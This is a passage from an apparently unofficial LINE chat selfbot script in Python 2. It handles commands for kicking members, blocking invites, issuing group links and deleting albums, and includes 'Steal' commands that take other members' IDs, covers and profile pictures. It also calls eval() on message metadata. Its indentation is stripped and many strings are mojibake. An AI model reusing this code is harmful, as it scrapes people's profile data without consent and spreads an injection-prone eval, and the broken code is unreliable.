cl.sendText(msg.to,"ƛԼƦЄƛƊƳ ƠƝ")
wait['pname'][msg.to] = True
wait['pname'][msg.to] = cl.getGroup(msg.to).name
if msg.from_ in admin:
gid = msg.to
autocancel[gid] = "poni"
cl.sendText(msg.to,"ƤƦƠƬЄƇƬ ƖƝƔƖƬƛƬƖƠƝ ƠƝ")
if msg.to in protection:
cl.sendText(msg.to,"ᴀʟʀᴇᴀᴅʏ Protect ᴏɴ")
else:
wait["pnharfbot"][msg.to] = cl.getGroup(msg.to).name
f=codecs.open('pnharfbot.json','w','utf-8')
json.dump(wait["pnharfbot"], f, sort_keys=True, indent=4,ensure_ascii=False)
protection.append(msg.to)
cl.sendText(msg.to,"Protect ᴛᴜʀɴᴇᴅ ᴏɴ")
if msg.from_ in admin:
if wait["Protectcancel"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Yang Cancel Undangan Kami Kick")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancel"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Yang Cancel Undangan Kami Kick")
else:
cl.sendText(msg.to,"done")
#==========================================================================
elif msg.text in ["Mode off","mode off"]:
if msg.from_ in admin:
if wait["Protectgr"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR Off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectgr"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR Off")
else:
cl.sendText(msg.to,"done")
if wait["Protectcancl"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan Off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancl"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan Off")
else:
cl.sendText(msg.to,"done")
if wait["Protectjoin"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"kick Joined Group Off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectjoin"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"kick Joined Group Off")
else:
cl.sendText(msg.to,"done")
if wait["qr"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Protection QR PRO Off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["qr"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection QR PRO Off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Already off\n\n"+ datetime.today().strftime('%H:%M:%S'))
if wait["protectionOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["protectionOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
if msg.to in wait['pname']:
cl.sendText(msg.to,"ƬƲƦƝ ƠƑƑ.")
del wait['pname'][msg.to]
else:
cl.sendText(msg.to,"ƛԼƦЄƛƊƳ ƠƑƑ")
if wait["Protectcancel"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Yang Cancel Undangan Tidak Kami Kick")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancel"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Yang Cancel Undangan Tidak Kami Kick")
else:
cl.sendText(msg.to,"done")
if "Mode off" == msg.text:
if msg.from_ in admin:
try:
del autocancel[msg.to]
cl.sendText(msg.to,"ƤƦƠƬЄƇƬ ƖƝƔƖƬƛƬƖƠƝ ƠƑƑ")
except:
pass
if "Mode off" == msg.text:
try:
if msg.from_ in admin:
protection.remove(msg.to)
cl.sendText(msg.to,"Protect ᴛᴜʀɴᴇᴅ ᴏғғ")
else:
cl.sendText(msg.to,"No have access Protect")
except:
pass
#==========================================================================
elif msg.text in ["Invite on","invite on"]:
#if msg.from_ in admin:
if wait["Protectcancel"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Yang Cancel Undangan Kami Kick")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancel"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Yang Cancel Undangan Kami Kick")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Cancel off","cancel off"]:
#if msg.from_ in admin:
if wait["Protectcancel"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Yang Cancel Undangan Tidak Kami Kick")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancel"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Yang Cancel Undangan Tidak Kami Kick")
else:
cl.sendText(msg.to,"done")
#======================================
elif msg.text in ["Protect:hight","protect:hight"]:
if msg.from_ in admin:
if wait["protectionOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["protectionOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Auto blockqr:off","auto blockqr:off"]:
if msg.from_ in admin:
if wait["qr"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Protection QR PRO Off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["qr"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection QR PRO Off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Already off\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Auto blockqr:on","auto blockqr:on"]:
if msg.from_ in admin:
if wait["qr"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already on\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Protection QR PRO On\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["qr"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection QR PRO On\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Already on")
elif msg.text in ["Protect:low","Protect:low"]:
if msg.from_ in admin:
if wait["protectionOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["protectionOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif "Namelock:on" in msg.text:
if msg.from_ in admin:
if msg.to in wait['pname']:
cl.sendText(msg.to,"ƬƲƦƝЄƊ ƠƝ.")
else:
cl.sendText(msg.to,"ƛԼƦЄƛƊƳ ƠƝ")
wait['pname'][msg.to] = True
wait['pro_name'][msg.to] = cl.getGroup(msg.to).name
elif "Namelock:off" in msg.text:
if msg.from_ in admin:
if msg.to in wait['pname']:
cl.sendText(msg.to,"ƬƲƦƝ ƠƑƑ.")
del wait['pname'][msg.to]
else:
cl.sendText(msg.to,"ƛԼƦЄƛƊƳ ƠƑƑ")
elif "Blockinvite:on" == msg.text:
if msg.from_ in admin:
gid = msg.to
autocancel[gid] = "poni"
cl.sendText(msg.to,"ƤƦƠƬЄƇƬ ƖƝƔƖƬƛƬƖƠƝ ƠƝ")
elif "Blockinvite:off" == msg.text:
if msg.from_ in admin:
try:
del autocancel[msg.to]
cl.sendText(msg.to,"ƤƦƠƬЄƇƬ ƖƝƔƖƬƛƬƖƠƝ ƠƑƑ")
except:
pass
elif "Protect on" == msg.text:
if msg.to in protection:
cl.sendText(msg.to,"Protect ᴀʟʀᴇᴀᴅʏ ᴏɴ")
else:
wait["pnharfbot"][msg.to] = cl.getGroup(msg.to).name
f=codecs.open('pnharfbot.json','w','utf-8')
json.dump(wait["pnharfbot"], f, sort_keys=True, indent=4,ensure_ascii=False)
protection.append(msg.to)
cl.sendText(msg.to,"Protect ᴛᴜʀɴᴇᴅ ᴏɴ")
elif "Protect off" == msg.text:
try:
if msg.from_ in admin:
protection.remove(msg.to)
cl.sendText(msg.to,"Protect ᴛᴜʀɴᴇᴅ ᴏғғ")
else:
cl.sendText(msg.to,"Protect ᴀʟʀᴇᴀᴅʏ ᴏғғ")
except:
pass
#================================================================
elif msg.text in ["Undang"]:
if msg.from_ in admin:
wait["winvite"] = True
cl.sendText(msg.to,"send contact")
elif msg.text in ["Tarik"]:
if msg.from_ in admin:
wait["winvite2"] = True
random.choice(KAC).sendText(msg.to,"Kirim contact Boss")
elif msg.text in ["Jepit"]:
if msg.from_ in admin:
wait["winvite2"] = True
random.choice(KAC).sendText(msg.to,"Kirim contact Boss")
#============================================================
elif "Steal mid" in msg.text:
if msg.from_ in admin:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
cl.sendText(msg.to,"Mc: " + key1)
elif "Steal contact" in msg.text:
if msg.from_ in admin:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
mmid = cl.getContact(key1)
msg.contentType = 13
msg.contentMetadata = {"mid": key1}
cl.sendMessage(msg)#=================
elif msg.text in ["Mc "]:
if msg.from_ in admin:
mmid = msg.text.replace("Mc ","")
msg.contentType = 13
msg.contentMetadata = {"mid":mmid}
cl.sendMessage(msg)
elif msg.text in ["Joinn on","joinn on"]:
if msg.from_ in admin:
if wait["Protectjoin"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Kick Joined Group On")
else:
cl.sendText(msg.to,"Done")
else:
wait["Protectjoin"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Kick Joined Group On")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Joinn off","joinn off"]:
if msg.from_ in admin:
if wait["Protectjoin"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"kick Joined Group Off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectjoin"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"kick Joined Group Off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Cancel on","cancel on"]:
if msg.from_ in admin:
if wait["Protectcancl"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan On")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancl"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan On")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Cancel off","cancel off"]:
if msg.from_ in admin:
if wait["Protectcancl"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan Off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancl"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan Off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Invite on","invite on"]:
if msg.from_ in admin:
if wait["Protectcancel"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Yang Cancel Undangan Kami Kick")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancel"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Yang Cancel Undangan Kami Kick")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Invite off","Invite off"]:
if msg.from_ in admin:
if wait["Protectcancel"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Yang Cancel Undangan Tidak Kami Kick")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancel"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Yang Cancel Undangan Tidak Kami Kick")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Qr on","qr on"]:
if msg.from_ in admin:
if wait["Protectgr"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR On")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectgr"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR On")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Qr off","qr off"]:
if msg.from_ in admin:
if wait["Protectgr"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR Off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectgr"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR Off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Contact On","Contact on","contact on"]:
if msg.from_ in admin:
if wait["contact"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cek Mid Lewat Share Kontak On")
else:
cl.sendText(msg.to,"done")
else:
wait["contact"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cek Mid Lewat Share Kontak On")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Contact Off","Contact off","contact off"]:
if msg.from_ in admin:
if wait["contact"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cek Mid Lewat Share Kontak Off")
else:
cl.sendText(msg.to,"done")
else:
wait["contact"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cek Mid Lewat Share Kontak Off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Join on","Auto join on"]:
if msg.from_ in admin:
if wait["autoJoin"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["autoJoin"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Join off","Auto join off"]:
if msg.from_ in admin:
if wait["autoJoin"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["autoJoin"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Gcancel:"]:
try:
strnum = msg.text.replace("Gcancel:","")
if strnum == "off":
wait["autoCancel"]["on"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Invitation refused turned off\nTo turn on please specify the number of people and send")
else:
cl.sendText(msg.to,"关了邀请拒�。�时开请指定人数��")
else:
num = int(strnum)
wait["autoCancel"]["on"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,strnum + "The group of people and below decided to automatically refuse invitation")
else:
cl.sendText(msg.to,strnum + "使人以下的å°�组ç���¨è‡ªåŠ¨é‚€è¯·æ���’ç»�")
except:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Value is wrong")
else:
cl.sendText(msg.to,"Bizarre ratings")
elif msg.text in ["Leave on","Auto leave:on"]:
if msg.from_ in admin:
if wait["leaveRoom"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["leaveRoom"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"�了开。")
elif msg.text in ["Leave off","Auto leave:off"]:
if msg.from_ in admin:
if wait["leaveRoom"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["leaveRoom"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"already")
elif msg.text in ["Share on","Share on"]:
if msg.from_ in admin:
if wait["timeline"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["timeline"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"�了开。")
elif msg.text in ["Share off","Share off"]:
if msg.from_ in admin:
if wait["timeline"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["timeline"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦�了关æ–。")
elif msg.text in ["Status","status"]:
if msg.from_ in admin:
md = "⭐Status Proteksi⭐\n*============*\n"
if wait["Protectgr"] == True: md+="[•]Protect QR [On]\n"
else: md+="[•]Protect QR [Off]\n"
if wait["Protectcancl"] == True: md+="[•]Protect Invite [On]\n"
else: md+="[•]Protect Invite [Off]\n"
if wait["contact"] == True: md+="[•]Contact [On]\n"
else: md+="[•]Contact [Off]\n"
if wait["autoJoin"] == True: md+="[•]Auto Join [On]\n"
else: md +="[•]Auto Join [Off]\n"
if wait["autoCancel"]["on"] == True:md+="[•]Group Cancel " + str(wait["autoCancel"]["members"]) + "\n"
else: md+= "[•]Group Cancel [Off]\n"
if wait["leaveRoom"] == True: md+="[•]Auto Leave [On]\n"
else: md+="[•]Auto Leave [Off]\n"
if wait["timeline"] == True: md+="[•]Share [On]\n"
else:md+="[•]Share [Off]\n"
if wait["autoAdd"] == True: md+="[•]Auto Add [On]\n"
else:md+="[•]Auto Add [Off]\n"
if wait["Backup"] == True: md+="[•]Backup : on\n"
else:md+="[•]Backup : off\n"
if wait["qr"] == True: md+="[•]AutoBlock QR : on\n"
else:md+="[•]AutoBlock QR : off\n"
if wait["commentOn"] == True: md+="[•]Comment [On]\n"
else:md+="[•]Comment [Off]\n"
if wait["Protectcancel"] == True: md+="[•]Protect Cancel [On]\n"
else: md+="[•]Protect Cancel [Off]\n"
if wait["protectionOn"] == True: md+="[•]Protection : hight\n"+ datetime.today().strftime('%H:%M:%S')
else:md+="[•]Protection : low\n"+ datetime.today().strftime('%H:%M:%S')
"\n*============*\n⭐✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰⭐\n*============*"
cl.sendText(msg.to,md)
elif "Time" in msg.text:
if msg.from_ in admin:
cl.sendText(msg.to,datetime.today().strftime('%H:%M:%S'))
elif "Album merit " in msg.text:
gid = msg.text.replace("Album merit ","")
album = cl.getAlbum(gid)
if album["result"]["items"] == []:
if wait["lang"] == "JP":
cl.sendText(msg.to,"There is no album")
else:
cl.sendText(msg.to,"相册没在。")
else:
if wait["lang"] == "JP":
mg = "The following is the target album"
else:
mg = "以下是对象的ç���¸å†Œ"
for y in album["result"]["items"]:
if "photoCount" in y:
mg += str(y["title"]) + ":" + str(y["photoCount"]) + "sheet\n"
else:
mg += str(y["title"]) + ":0sheet\n"
cl.sendText(msg.to,mg)
elif "Album " in msg.text:
gid = msg.text.replace("Album ","")
album = cl.getAlbum(gid)
if album["result"]["items"] == []:
if wait["lang"] == "JP":
cl.sendText(msg.to,"There is no album")
else:
cl.sendText(msg.to,"相册没在。")
else:
if wait["lang"] == "JP":
mg = "The following is the target album"
else:
mg = "以下是对象的相册"
for y in album["result"]["items"]:
if "photoCount" in y:
mg += str(y["title"]) + ":" + str(y["photoCount"]) + "sheet\n"
else:
mg += str(y["title"]) + ":0sheet\n"
elif "Album remove " in msg.text:
gid = msg.text.replace("Album remove ","")
albums = cl.getAlbum(gid)["result"]["items"]
i = 0
if albums != []:
for album in albums:
cl.deleteAlbum(gid,album["id"])
i += 1
if wait["lang"] == "JP":
cl.sendText(msg.to,str(i) + "Deleted albums")
else:
cl.sendText(msg.to,str(i) + "åˆ é™¤äº†äº‹çš„ç›¸å†Œã€‚")
elif msg.text in ["Group id"]:
gid = cl.getGroupIdsJoined()
h = ""
for i in gid:
h += "[%s]:\n%s\n" % (cl.getGroup(i).name,i)
cl.sendText(msg.to,h)
elif msg.text in ["Cancelall"]:
if msg.from_ in admin:
gid = cl.getGroupIdsInvited()
for i in gid:
cl.rejectGroupInvitation(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"All invitations have been refused")
else:
cl.sendText(msg.to,"拒�了全部的邀请。")
elif "Album removeat’" in msg.text:
gid = msg.text.replace("Album removeat’","")
albums = cl.getAlbum(gid)["result"]["items"]
i = 0
if albums != []:
for album in albums:
cl.deleteAlbum(gid,album["id"])
i += 1
if wait["lang"] == "JP":
cl.sendText(msg.to,str(i) + "Albums deleted")
else:
cl.sendText(msg.to,str(i) + "åˆ é™¤äº†äº‹çš„ç›¸å†Œã€‚")
elif msg.text in ["Add on","Auto add:on"]:
if msg.from_ in admin:
if wait["autoAdd"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"Done")
else:
wait["autoAdd"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done")
else:
cl.sendText(msg.to,"�了开。")
elif msg.text in ["Add off","Auto add:off"]:
if msg.from_ in admin:
if wait["autoAdd"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["autoAdd"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦�了关æ–。")
elif "Message change: " in msg.text:
wait["message"] = msg.text.replace("Message change: ","")
cl.sendText(msg.to,"message changed")
elif "Message add: " in msg.text:
wait["message"] = msg.text.replace("Message add: ","")
if wait["lang"] == "JP":
cl.sendText(msg.to,"message changed")
else:
cl.sendText(msg.to,"done。")
elif msg.text in ["Message","è‡ªå‹•è¿½åŠ å•�候語確èª�"]:
if wait["lang"] == "JP":
cl.sendText(msg.to,"message change to\n\n" + wait["message"])
else:
cl.sendText(msg.to,"The automatic appending information is set as follows。\n\n" + wait["message"])
elif "Comment:" in msg.text:
c = msg.text.replace("Comment:","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"message changed")
else:
wait["comment"] = c
cl.sendText(msg.to,"changed\n\n" + c)
elif "Add comment:" in msg.text:
c = msg.text.replace("Add comment:","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"String that can not be changed")
else:
wait["comment"] = c
cl.sendText(msg.to,"changed\n\n" + c)
#-----------------------------------------------
elif msg.text in ["Backup:on"]:
if msg.from_ in admin:
if wait["Backup"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"backup has been active\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"backup has been enable\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["Backup"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"backup has been active\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"backup has been enable\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Backup:off"]:
if msg.from_ in admin:
if wait["Backup"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"backup has been unactive\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"backup has been desable\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["Backup"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"backup has been unactive\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"backup has been desable\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Rejectall"]:
if msg.from_ in admin:
gid = cl.getGroupIdsInvited()
for i in gid:
cl.rejectGroupInvitation(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"All Invites has been Rejected")
else:
cl.sendText(msg.to,"拒绝了全部的邀请。")
#---------------------Sc invite owner ke group------
elif "Asupka: " in msg.text:
if msg.from_ in owner:
gid = msg.text.replace("Asupka: ","")
if gid == "":
cl.sendText(msg.to,"Invalid group id")
else:
try:
cl.findAndAddContactsByMid(msg.from_)
cl.inviteIntoGroup(gid,[msg.from_])
except:
cl.sendText(msg.to,"Mungkin saya tidak di dalaam grup itu")
#--------===---====--------------
elif msg.text in ["コメント:オン","Comment on","Comment:on","自動首é �留言:開"]:
if msg.from_ in admin:
if wait["commentOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"already on")
else:
wait["commentOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"�了开。")
elif msg.text in ["コメント:オフ","Comment off","comment off","自動首é �留言:關"]:
if wait["commentOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"already off")
else:
wait["commentOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦�了关æ–。")
elif msg.text in ["Comment","留言確�"]:
cl.sendText(msg.to,"message changed to\n\n" + str(wait["comment"]))
elif msg.text in ["Gurl"]:
if msg.from_ in admin:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
cl.updateGroup(x)
gurl = cl.reissueGroupTicket(msg.to)
cl.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can't be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Cv1 gurl"]:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
ki.updateGroup(x)
gurl = ki.reissueGroupTicket(msg.to)
ki.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can't be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Cv2 gurl"]:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
kk.updateGroup(x)
gurl = kk.reissueGroupTicket(msg.to)
kk.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can't be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Cv3 gurl"]:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
kc.updateGroup(x)
gurl = kc.reissueGroupTicket(msg.to)
kc.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can't be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Comment bl "]:
wait["wblack"] = True
cl.sendText(msg.to,"add to comment bl")
elif msg.text in ["Comment wl "]:
wait["dblack"] = True
cl.sendText(msg.to,"wl to comment bl")
elif msg.text in ["Comment bl confirm"]:
if wait["commentBlack"] == {}:
cl.sendText(msg.to,"confirmed")
else:
cl.sendText(msg.to,"Blacklist")
mc = ""
for mi_d in wait["commentBlack"]:
mc += "" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
#-------------Fungsi Jam on/off Start-------------------#
elif msg.text in ["Jam on"]:
if msg.from_ in admin:
if wait["clock"] == True:
kc.sendText(msg.to,"Bot 4 jam on")
else:
wait["clock"] = True
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = kc.getProfile()
profile.displayName = wait["cName4"] + nowT
kc.updateProfile(profile)
kc.sendText(msg.to,"Jam Selalu On")
elif msg.text in ["Jam off"]:
if msg.from_ in admin:
if wait["clock"] == False:
kc.sendText(msg.to,"Bot 4 jam off")
else:
wait["clock"] = False
kc.sendText(msg.to,"Jam Sedang Off")
#-------------Fungsi Jam on/off Finish-------------------#
#-------------Fungsi Change Clock Start------------------#
elif msg.text in ["Change clock"]:
n = msg.text.replace("Change clock","")
if len(n.decode("utf-8")) > 13:
cl.sendText(msg.to,"changed")
else:
wait["cName"] = n
cl.sendText(msg.to,"changed to\n\n" + n)
#-------------Fungsi Change Clock Finish-----------------#
#-------------Fungsi Jam Update Start---------------------#
elif msg.text in ["Jam Update"]:
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = kc.getProfile()
profile.displayName = wait["cName4"] + nowT
kc.updateProfile(profile)
kc.sendText(msg.to,"Sukses update")
else:
kc.sendText(msg.to,"Aktifkan jam terlebih dulu")
#-------------Fungsi Jam Update Finish-------------------#
#========================================
elif "Steal cover @" in msg.text:
if msg.from_ in admin:
print "[Command]dp executing"
_name = msg.text.replace("Steal cover @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
cu = cl.channel.getCover(target)
path = str(cu)
cl.sendImageWithURL(msg.to, path)
except:
pass
print "[Command]dp executed"
elif "Midpict:" in msg.text:
if msg.from_ in admin:
umid = msg.text.replace("Midpict:","")
contact = cl.getContact(umid)
try:
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
except:
image = "https://www.1and1.co.uk/digitalguide/fileadmin/DigitalGuide/Teaser/not-found-t.jpg"
try:
cl.sendImageWithURL(msg.to,image)
except Exception as error:
cl.sendText(msg.to,(error))
pass
elif "Steal pict " in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
msg.contentType = 0
steal0 = msg.text.replace("Steal pict ","")
steal1 = steal0.lstrip()
steal2 = steal1.replace("@","")
steal3 = steal2.rstrip()
_name = steal3
group = cl.getGroup(msg.to)
targets = []
for g in group.members:
if _name == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
try:
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
except:
